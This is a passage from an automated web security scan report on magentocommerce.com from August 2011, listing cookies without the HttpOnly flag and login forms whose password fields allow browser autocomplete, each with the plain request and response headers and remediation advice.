Set-Cookie: exp_last_activity=1313176624; expires=Sat, 11-Aug-2012 15:17:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A29%3A%22%2Fvirtual%2Fenterprise-register%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.169. http://www.magentocommerce.com/whitepaper/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /whitepaper/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /whitepaper/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fwhitepaper%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 34176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.170. http://www.magentocommerce.com/wiki  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /wiki

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wiki HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fwiki%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Location: http://www.magentocommerce.com/wiki/
Content-Length: 0

5. Password field with autocomplete enabled  previous  next
There are 152 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

5.1. http://www.magentocommerce.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: guid=db13949594b1b3d2138f3212e370aacf; expires=Mon, 06-Aug-2012 13:40:32 GMT; path=/
Set-Cookie: exp_domain=magentocommerce.com; expires=Sat, 11-Aug-2012 23:48:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=997810832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:40:32 GMT
Content-Length: 35354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.2. http://www.magentocommerce.com/!!!--  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.3. http://www.magentocommerce.com/answers/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
        <form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
           <input type="hidden" name="login[back_url]" value="/answers/">
...[SNIP]...
</label>
           <input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]" /></p>
...[SNIP]...
5.4. http://www.magentocommerce.com/blog  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.8. http://www.magentocommerce.com/boards/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.9. http://www.magentocommerce.com/boards/viewforum/10252/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.10. http://www.magentocommerce.com/boards/viewthread/1647/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.11. http://www.magentocommerce.com/bug-tracking  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.12. http://www.magentocommerce.com/casestudies  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
